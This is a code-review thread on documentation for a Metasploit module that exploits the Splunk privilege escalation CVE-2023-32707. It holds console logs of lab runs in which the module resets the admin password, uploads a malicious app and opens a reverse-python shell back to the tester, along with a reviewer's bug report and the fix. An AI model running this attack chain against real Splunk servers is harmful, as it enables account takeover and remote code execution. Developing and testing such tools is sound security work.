documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md

```diff
@@ -0,0 +1,200 @@
+[*] Changing 'user' password to yMDIOKyrHoUx
+[+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
+[-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+```
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
+
+Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
+
+   Name             Current Setting      Required  Description
+   ----             ---------------      --------  -----------
+   APP_NAME                              no        The name of the app to upload (default: random)
+   PASSWORD         changeme             yes       The password for the specified username
+   Proxies          http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           127.0.0.1            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT            8000                 yes       The target port (TCP)
+   SSL              false                no        Negotiate SSL/TLS for outgoing connections
+   TARGET_PASSWORD                       no        The new password to set for the admin user (default: random)
+   TARGET_USER      admin                yes       The username to change the password for (default: admin)
+   USERNAME         redway               yes       The username with "edit_user" role to authenticate as
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/sh          yes       The system shell to use
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Splunk version 9.0.4 detected
+[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
+[*] Changing 'admin' password to srviInIpi
+[+] Password of the user 'admin' has bee changed to srviInIpi
+[*] Uploading app stringtough
+[*] Uploading file stringtough
+[*] Creating an application package named: stringtough
+[+] stringtough successfully uploaded
+[*] Waiting for session
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
```

Comment:
I think I might be missing something - I'm unable to get the session opened. I ran the two curl commands above, configured my options, and this was my output
```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check

[*] Detected Splunk version 9.0.4 which is vulnerable
[+] 127.0.0.1:8000 - The target is vulnerable. User 'redway' has 'edit_user' capability
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options

Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   APP_NAME         zaam-dox         no        The name of the app to upload (default: random)
   PASSWORD         changeme         yes       The password for the specified username
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            8000             yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   TARGET_PASSWORD  MWKbhjxoVu       no        The new password to set for the admin user (default: random)
   TARGET_USER      admin            yes       The username to change the password for (default: admin)
   USERNAME         redway           yes       The username with "edit_user" role to authenticate as
   VHOST                             no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use


Exploit target:

   Id  Name
   --  ----
   0   Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit

[*] Started reverse TCP handler on 192.168.2.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to MWKbhjxoVu
[+] Password of the user 'admin' has been changed to MWKbhjxoVu
[*] Uploading file zaam-dox
[+] zaam-dox successfully uploaded
[-] Exploit aborted due to failure: unexpected-reply: Unable to get JOB ID of the command
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
```
Any idea what's going wrong here?

Reply:
The `-` in the app name is a known lousy char, and the regex to remove it was not correctly handling it. Now it is fixed with the commit [5e19c8f](https://github.com/rapid7/metasploit-framework/pull/18348/commits/5e19c8fd887f6dbdd8e65c1a2a6cc20d880dedcc)